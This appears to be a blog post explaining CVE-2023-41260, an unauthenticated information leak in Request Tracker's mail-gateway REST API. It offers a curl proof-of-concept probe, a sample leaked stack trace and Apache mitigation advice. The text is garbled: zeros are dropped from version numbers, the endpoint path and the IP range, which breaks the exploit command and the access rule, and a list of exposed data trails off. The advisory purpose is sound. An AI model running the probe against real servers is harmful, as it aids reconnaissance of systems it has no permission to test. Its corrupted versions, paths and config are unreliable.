CVE-2023-41260 - Understanding the RT Mail-Gateway REST API Info Leak (With Exploit Examples)

In August 2023, a critical security flaw was discovered and published as CVE-2023-41260 in the Best Practical Request Tracker (RT). This vulnerability affects most RT systems before versions 4.4.7 and 5..5. If your organization uses RT to manage tickets, there's a high chance your helpdesk or support system is/was vulnerable to leaking sensitive system information via the mail-gateway REST API.

This article breaks down how CVE-2023-41260 works, what kind of data is exposed, and provides safe code samples and proof-of-concept exploit steps. For those running RT, patching is absolutely essential. Read until the end for practical detection and remediation tips.

What is Request Tracker’s Mail-Gateway REST API?

Request Tracker (RT) is an open-source support ticketing system. Part of its automation arsenal is the mail-gateway REST API, which receives emails and turns them into RT tickets.

This endpoint is supposed to be used only for legitimate email injection. However, due to insufficient controls, certain responses to API calls could accidentally disclose sensitive or internal information to unauthenticated users.

The Heart of CVE-2023-41260

Previous versions of RT lacked sufficient sanitization and privilege checks in REST/1./NoAuth/mail-gateway. When an unauthenticated user sent a malformed request to this API endpoint, the server’s response sometimes included:

Configuration snippets and environmental info

This unintended information disclosure helps attackers map your system for further exploitation or social engineering.

An Example Exploit in Action

Let’s imagine you have RT set up at: https://rt.example.com/.

With curl, you can submit an incomplete or malformed POST request

curl -i -k -X POST https://rt.example.com/REST/1./NoAuth/mail-gateway \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "some_bad_param=bad_value"

If still vulnerable, the response may look like

HTTP/1.1 500 Internal Server Error
Content-Type: text/plain; charset=utf-8

An internal RT error has occurred.  The RT team has been notified.
...

Stack Trace:
Trace begun at /opt/rt5/sbin/../lib/RT/Interface/Email.pm line 300
...
RT::Config::Get
RT_SiteConfig.pm line 42
...

Notice

- Server file paths: /opt/rt5/...

Environment details: Perl module lines, config info

All this is gold for an attacker preparing targeted attacks.

References

- Best Practical Advisory
- NIST CVE Entry
- RT Release Notes
- Metasploit module discussion

Upgrade RT ASAP to 4.4.7 or 5..5 (or later).

- See official patch notes.

If immediate patching isn’t possible,

- Limit public internet access to /REST/1./NoAuth/mail-gateway using web server rules.

Apache example to restrict the endpoint

<Location "/REST/1./NoAuth/mail-gateway">
    Require ip 192.168.1./24
</Location>

Conclusion

CVE-2023-41260 is a classic reminder that error handling and API privilege checks are as critical as authentication itself. If your RT helpdesk is exposed online and hasn't seen a recent update, you might be giving away the blueprints of your setup to anyone who asks the right (malformed) way.

Patch now—or risk making the next attack on your infrastructure an inside job.


*Want to dig deeper? Get the full details on the Best Practical Advisory page.* If you found this helpful, share the warning with your sysadmin friends!

Timeline

Published on: 11/03/2023 05:15:29 UTC
Last modified on: 11/13/2023 17:17:24 UTC